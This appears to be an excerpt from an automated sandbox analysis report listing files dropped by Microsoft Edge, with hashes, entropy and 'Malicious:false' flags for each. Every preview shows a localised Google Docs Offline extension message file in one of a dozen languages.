                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):883
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1031
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                            MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                            SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                            SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                            SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1613
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                            MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                            SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                            SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                            SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):851
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):848
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                            MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                            SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                            SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                            SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1425
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                            MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                            SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                            SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                            SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):961
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                            MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                            SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                            SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                            SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):959
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                            MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                            SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                            SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                            SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):968
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                            MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                            SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                            SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                            SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):838
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                            MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                            SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                            SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                            SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1305
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                            MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                            SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                            SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                            SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):911
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                            MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                            SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                            SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                            SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):939
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                            MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                            SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                            SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                            SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):977
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                            MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                            SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                            SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                            SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):972
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                            MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                            SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                            SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                            SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                            Malicious:false
